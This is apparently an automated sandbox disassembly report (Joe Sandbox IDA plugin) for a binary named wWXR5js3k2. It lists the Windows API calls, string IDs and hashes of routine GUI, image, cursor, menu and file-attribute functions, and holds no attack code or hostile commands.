                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 006DA34D
                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 006DA36F
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006DA382
                                                    • DestroyWindow.USER32(00000000), ref: 006DA3A4
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00650000,00000000), ref: 006DA3DB
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006DA3F4
                                                    • GetDesktopWindow.USER32 ref: 006DA40D
                                                    • GetWindowRect.USER32(00000000), ref: 006DA414
                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 006DA42C
                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 006DA444
                                                      • Part of subcall function 006525DB: GetWindowLongW.USER32(?,000000EB), ref: 006525EC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                    • String ID: 0$@U=u$hW$tooltips_class32
                                                    • API String ID: 1297703922-2843442765
                                                    • Opcode ID: c72d1693cb9475a25c619468c42064dfe85ced7554b951154d388e78b3a0affd
                                                    • Instruction ID: 9bee4221da651b106561a5d43a1a0afaaea351f5769ca9406fc8c298d70e6c0c
                                                    • Opcode Fuzzy Hash: c72d1693cb9475a25c619468c42064dfe85ced7554b951154d388e78b3a0affd
                                                    • Instruction Fuzzy Hash: FA71BE70944245AFD725CF68CC49FA677E6FB89300F04852EF985873A0CBB4E906CB56
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 006DBA56
                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 006DBA6D
                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 006DBA78
                                                    • CloseHandle.KERNEL32(00000000), ref: 006DBA85
                                                    • GlobalLock.KERNEL32(00000000), ref: 006DBA8E
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006DBA9D
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 006DBAA6
                                                    • CloseHandle.KERNEL32(00000000), ref: 006DBAAD
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 006DBABE
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,006E2CAC,?), ref: 006DBAD7
                                                    • GlobalFree.KERNEL32(00000000), ref: 006DBAE7
                                                    • GetObjectW.GDI32(?,00000018,000000FF), ref: 006DBB0B
                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 006DBB36
                                                    • DeleteObject.GDI32(00000000), ref: 006DBB5E
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 006DBB74
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID: @U=u
                                                    • API String ID: 3840717409-2594219639
                                                    • Opcode ID: 0e05b78af06530649f2505e644bd03cf88dcfdf6225ba0b332a8c59dfb8fd447
                                                    • Instruction ID: 9b434e0fdbda5b683fdcca5f6b952fd994b21bd19a52574bce475e9505d6ba64
                                                    • Opcode Fuzzy Hash: 0e05b78af06530649f2505e644bd03cf88dcfdf6225ba0b332a8c59dfb8fd447
                                                    • Instruction Fuzzy Hash: 88413C75901204EFDB119FA5DC48EAA7BBAFF89711F15506AF906D7360DB309E01CB60
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 006AA47A
                                                    • __swprintf.LIBCMT ref: 006AA51B
                                                    • _wcscmp.LIBCMT ref: 006AA52E
                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 006AA583
                                                    • _wcscmp.LIBCMT ref: 006AA5BF
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 006AA5F6
                                                    • GetDlgCtrlID.USER32(?), ref: 006AA648
                                                    • GetWindowRect.USER32(?,?), ref: 006AA67E
                                                    • GetParent.USER32(?), ref: 006AA69C
                                                    • ScreenToClient.USER32(00000000), ref: 006AA6A3
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 006AA71D
                                                    • _wcscmp.LIBCMT ref: 006AA731
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 006AA757
                                                    • _wcscmp.LIBCMT ref: 006AA76B
                                                      • Part of subcall function 0067362C: _iswctype.LIBCMT ref: 00673634
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                    • String ID: %s%u
                                                    • API String ID: 3744389584-679674701
                                                    • Opcode ID: 9dd8f978171d99823c891151835e2424c1f58ff4004a58d428142ff5fb7d978d
                                                    • Instruction ID: f8d392ce07bc1e4f5e9165d800349ad04241185e046b337b2fd8cd69eae81290
                                                    • Opcode Fuzzy Hash: 9dd8f978171d99823c891151835e2424c1f58ff4004a58d428142ff5fb7d978d
                                                    • Instruction Fuzzy Hash: 32A1B371604606AFD715EFA0C884BEAB7EAFF45314F00852AF999C2290DB30ED55CF92
                                                    APIs
                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 006AAF18
                                                    • _wcscmp.LIBCMT ref: 006AAF29
                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 006AAF51
                                                    • CharUpperBuffW.USER32(?,00000000), ref: 006AAF6E
                                                    • _wcscmp.LIBCMT ref: 006AAF8C
                                                    • _wcsstr.LIBCMT ref: 006AAF9D
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 006AAFD5
                                                    • _wcscmp.LIBCMT ref: 006AAFE5
                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 006AB00C
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 006AB055
                                                    • _wcscmp.LIBCMT ref: 006AB065
                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 006AB08D
                                                    • GetWindowRect.USER32(00000004,?), ref: 006AB0F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                    • String ID: @$ThumbnailClass
                                                    • API String ID: 1788623398-1539354611
                                                    • Opcode ID: a63668c24b3a17bce259f7656e609281478a6d40173af470ed7e29d27bbfcf18
                                                    • Instruction ID: 940a5c68bc838d634e51604f12b5af45f0354c9435b8d56854fe55206d93e7ca
                                                    • Opcode Fuzzy Hash: a63668c24b3a17bce259f7656e609281478a6d40173af470ed7e29d27bbfcf18
                                                    • Instruction Fuzzy Hash: 9981A1711082059FDB04EF10C885FAA77EAEF45314F04956EFD858A292DB34DD49CFA1
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                    • API String ID: 1038674560-1810252412
                                                    • Opcode ID: d9eb650cab42b6eec8529b4ff6253cdba127f203c782fc9c03220e5a1e749c03
                                                    • Instruction ID: 8dccc77ed819761efe185849e62079105cd0edd423ad07b19a37a85cd9da5c51
                                                    • Opcode Fuzzy Hash: d9eb650cab42b6eec8529b4ff6253cdba127f203c782fc9c03220e5a1e749c03
                                                    • Instruction Fuzzy Hash: ED31E5B0A48205EBDA58FA94DD03EEE73A6AF11721F20421EF803711D1EF556F08CA5A
                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 006C5013
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 006C501E
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 006C5029
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 006C5034
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 006C503F
                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 006C504A
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 006C5055
                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 006C5060
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 006C506B
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 006C5076
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 006C5081
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 006C508C
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 006C5097
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 006C50A2
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 006C50AD
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 006C50B8
                                                    • GetCursorInfo.USER32(?), ref: 006C50C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Cursor$Load$Info
                                                    • String ID:
                                                    • API String ID: 2577412497-0
                                                    • Opcode ID: ffe477f507a518c03af2d7bb42d2218b96599dd3df96ac526b6357f46b7e3177
                                                    • Instruction ID: 653492589fa5d2892231c0d2ae046cf050fcd31c7cff3f068b5a5bdfd0712365
                                                    • Opcode Fuzzy Hash: ffe477f507a518c03af2d7bb42d2218b96599dd3df96ac526b6357f46b7e3177
                                                    • Instruction Fuzzy Hash: AA3117B1E083196ADF109FB68C89DAFBFE9FF04750F50452AA50DE7280DA78A540CF95
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 006D4424
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006D446F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                    • API String ID: 3974292440-383632319
                                                    • Opcode ID: da2ee399d677a24c2d653990e409343541dc8a10e2f7fc7e2475411583984c0b
                                                    • Instruction ID: efb93c02bb9de4cdd675dfbd288dd316649e24b8c25f2e8b9e29d4a2086eab79
                                                    • Opcode Fuzzy Hash: da2ee399d677a24c2d653990e409343541dc8a10e2f7fc7e2475411583984c0b
                                                    • Instruction Fuzzy Hash: A5917E70604701DBCB44EF20C451A6EB7E3AF95350F14886DF8965B3A2CB35ED4ACBA5
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 006DB8B4
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,006D6B11,?), ref: 006DB910
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006DB949
                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 006DB98C
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006DB9C3
                                                    • FreeLibrary.KERNEL32(?), ref: 006DB9CF
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006DB9DF
                                                    • DestroyIcon.USER32(?), ref: 006DB9EE
                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 006DBA0B
                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 006DBA17
                                                      • Part of subcall function 00672EFD: __wcsicmp_l.LIBCMT ref: 00672F86
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                    • String ID: .dll$.exe$.icl$@U=u
                                                    • API String ID: 1212759294-1639919054
                                                    • Opcode ID: bad2c47dba8fe2b400dbfac38ae8294f05a6b3e29ff9ca112247dc8f6f3f8129
                                                    • Instruction ID: 9a29d747c9cfdc985b4b4a04ab847fdae42156ef1ffe65606d05a7243032cca2
                                                    • Opcode Fuzzy Hash: bad2c47dba8fe2b400dbfac38ae8294f05a6b3e29ff9ca112247dc8f6f3f8129
                                                    • Instruction Fuzzy Hash: 1961E071900205FAEB14DF64DC41FFE7BAAFB09720F10851AF915DA2C1DB749A81DBA0
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006DC1FC
                                                    • GetFocus.USER32 ref: 006DC20C
                                                    • GetDlgCtrlID.USER32(00000000), ref: 006DC217
                                                    • _memset.LIBCMT ref: 006DC342
                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 006DC36D
                                                    • GetMenuItemCount.USER32(?), ref: 006DC38D
                                                    • GetMenuItemID.USER32(?,00000000), ref: 006DC3A0
                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 006DC3D4
                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 006DC41C
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006DC454
                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 006DC489
                                                    Strings
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                    • String ID: 0$hW
                                                    • API String ID: 1296962147-580508736
                                                    • Opcode ID: 9880cb6300dc791296adee650a1fbc8a916680f436c210d59c80a60f36a81a50
                                                    • Instruction ID: 5bee6b2a3419005999dbf64fe69e760f9b083a171e90f2e5ff2a8707f230a820
                                                    • Opcode Fuzzy Hash: 9880cb6300dc791296adee650a1fbc8a916680f436c210d59c80a60f36a81a50
                                                    • Instruction Fuzzy Hash: 3D817D70A093069FD714CF14C894AABBBEAFF88724F00492EF99597391D730D905CB92
                                                    APIs
                                                      • Part of subcall function 00651B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00652036,?,00000000,?,?,?,?,006516CB,00000000,?), ref: 00651B9A
                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006520D3
                                                    • KillTimer.USER32(-00000001,?,?,?,?,006516CB,00000000,?,?,00651AE2,?,?), ref: 0065216E
                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 0068BCA6
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006516CB,00000000,?,?,00651AE2,?,?), ref: 0068BCD7
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006516CB,00000000,?,?,00651AE2,?,?), ref: 0068BCEE
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006516CB,00000000,?,?,00651AE2,?,?), ref: 0068BD0A
                                                    • DeleteObject.GDI32(00000000), ref: 0068BD1C
                                                    Strings
                                                    Similarity
                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                    • String ID: hW
                                                    • API String ID: 641708696-1300829777
                                                    • Opcode ID: 4e01ec67ca4e53035568c4688156f2b727b18c8ef43dcca17958babf7b97ce45
                                                    • Instruction ID: ec0b860ac294893fa82b4c40af92d2ae9cb3ea5349f1e40fe81b69ab6597cdc9
                                                    • Opcode Fuzzy Hash: 4e01ec67ca4e53035568c4688156f2b727b18c8ef43dcca17958babf7b97ce45
                                                    • Instruction Fuzzy Hash: 3A619E31501A01DFCB39AF18D968BAAB7F3FF81312F10952DE9424BAB0C774A895DB54
                                                    APIs
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                    • CharLowerBuffW.USER32(?,?), ref: 006BA3CB
                                                    • GetDriveTypeW.KERNEL32 ref: 006BA418
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006BA460
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006BA497
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006BA4C5
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                    Strings
                                                    Similarity
                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 2698844021-4113822522
                                                    • Opcode ID: b859b1a37dd5583982ec8199e417f1d25055b53edf1f3ca515577fb5175441a1
                                                    • Instruction ID: 557a5639f4fc328d1524fffb5763d4fb258770b98316ffeb5cacc3c6ba58aaa0
                                                    • Opcode Fuzzy Hash: b859b1a37dd5583982ec8199e417f1d25055b53edf1f3ca515577fb5175441a1
                                                    • Instruction Fuzzy Hash: 39515FB1514305DFC780EF20C8918AAB7E6EF94719F00896DF89A572A1DB31ED09CB56
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0068E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 006AF8DF
                                                    • LoadStringW.USER32(00000000,?,0068E029,00000001), ref: 006AF8E8
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0068E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 006AF90A
                                                    • LoadStringW.USER32(00000000,?,0068E029,00000001), ref: 006AF90D
                                                    • __swprintf.LIBCMT ref: 006AF95D
                                                    • __swprintf.LIBCMT ref: 006AF96E
                                                    • _wprintf.LIBCMT ref: 006AFA17
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 006AFA2E
                                                    Strings
                                                    Similarity
                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                    • API String ID: 984253442-2268648507
                                                    • Opcode ID: 20b5098c413347365de18324115fa8611d0cfa6c813478c06222a6b0e7b6c0ed
                                                    • Instruction ID: 78958a804f3647732314eb266c5141a8e2fd74553b7cbdd916cd98a3dd540003
                                                    • Opcode Fuzzy Hash: 20b5098c413347365de18324115fa8611d0cfa6c813478c06222a6b0e7b6c0ed
                                                    • Instruction Fuzzy Hash: 7F414E7280021DAACF44FFE0DD96DEEB77AAF15301F100169B906760A2EA356F09CB65
                                                    APIs
                                                      • Part of subcall function 006525DB: GetWindowLongW.USER32(?,000000EB), ref: 006525EC
                                                    • GetSysColor.USER32(0000000F), ref: 006521D3
                                                    Strings
                                                    Similarity
                                                    • API ID: ColorLongWindow
                                                    • String ID: hW
                                                    • API String ID: 259745315-1300829777
                                                    • Opcode ID: a1dfb151501d28101c3f20c7b0757a08fbc418a25cfc329f79206f1694eb4553
                                                    • Instruction ID: a480d999eb890079c4e6f160aa38024e30fe5cc51386f835290f4bb6ee92db14
                                                    • Opcode Fuzzy Hash: a1dfb151501d28101c3f20c7b0757a08fbc418a25cfc329f79206f1694eb4553
                                                    • Instruction Fuzzy Hash: 5E41B035400141DEDB255F28EC98BF93B67EB07322F185366FE668A2E1C7318E46DB21
                                                    APIs
                                                    • __wsplitpath.LIBCMT ref: 006BDA10
                                                    • _wcscat.LIBCMT ref: 006BDA28
                                                    • _wcscat.LIBCMT ref: 006BDA3A
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006BDA4F
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 006BDA63
                                                    • GetFileAttributesW.KERNEL32(?), ref: 006BDA7B
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 006BDA95
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 006BDAA7
                                                    Strings
                                                    Similarity
                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                    • String ID: *.*
                                                    • API String ID: 34673085-438819550
                                                    • Opcode ID: b0db41b804a5d33b66ba3f38202c2c99d0b1819d0a2aec9dc7a74f2f9ec39329
                                                    • Instruction ID: 951882f83d987cc4cca417a3d0df2617d203e9cc446f892ba9d7b89637d604a7
                                                    • Opcode Fuzzy Hash: b0db41b804a5d33b66ba3f38202c2c99d0b1819d0a2aec9dc7a74f2f9ec39329
                                                    • Instruction Fuzzy Hash: 448192B15042419FCB64EF64C8449EAB7EAAF89350F18892EF889CB351E734D985CB52
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006D6FA5
                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 006D6FA8
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 006D6FCC
                                                    • _memset.LIBCMT ref: 006D6FDD
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006D6FEF
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 006D7067
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow_memset
                                                    • String ID: hW
                                                    • API String ID: 830647256-1300829777
                                                    • Opcode ID: c45c508dd31caf2a4076f3ed1af0e40da66ba41d27199229e563cbcef554132f
                                                    • Instruction ID: 016ad49d75eb83a22929877c44ceac1739929a79447921223e596c80e97caa51
                                                    • Opcode Fuzzy Hash: c45c508dd31caf2a4076f3ed1af0e40da66ba41d27199229e563cbcef554132f
                                                    • Instruction Fuzzy Hash: 16618A71900208AFDB10DFA8CC81EEE77BAEB09710F14415AFA14AB3E1D775AD41DB94
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 006C738F
                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 006C739B
                                                    • CreateCompatibleDC.GDI32(?), ref: 006C73A7
                                                    • SelectObject.GDI32(00000000,?), ref: 006C73B4
                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 006C7408
                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 006C7444
                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 006C7468
                                                    • SelectObject.GDI32(00000006,?), ref: 006C7470
                                                    • DeleteObject.GDI32(?), ref: 006C7479
                                                    • DeleteDC.GDI32(00000006), ref: 006C7480
                                                    • ReleaseDC.USER32(00000000,?), ref: 006C748B
                                                    Strings
                                                    Similarity
                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                    • String ID: (
                                                    • API String ID: 2598888154-3887548279
                                                    • Opcode ID: 87330bd85457050d8d001bd503310c9181f4b49413e7400704415d1d09c1db33
                                                    • Instruction ID: 8f4cd15a79a5c361ca25d48ab2bff4b167f1fc28c29fb8e2231bbd202b22560e
                                                    • Opcode Fuzzy Hash: 87330bd85457050d8d001bd503310c9181f4b49413e7400704415d1d09c1db33
                                                    • Instruction Fuzzy Hash: 89514771904349EFCB14CFA8CC85EAEBBBAEF48310F14842EF95A97210C731A9408B60
                                                    APIs
                                                    • timeGetTime.WINMM ref: 006B4F7A
                                                      • Part of subcall function 0067049F: timeGetTime.WINMM(?,753DB400,00660E7B), ref: 006704A3
                                                    • Sleep.KERNEL32(0000000A), ref: 006B4FA6
                                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 006B4FCA
                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 006B4FEC
                                                    • SetActiveWindow.USER32 ref: 006B500B
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006B5019
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 006B5038
                                                    • Sleep.KERNEL32(000000FA), ref: 006B5043
                                                    • IsWindow.USER32 ref: 006B504F
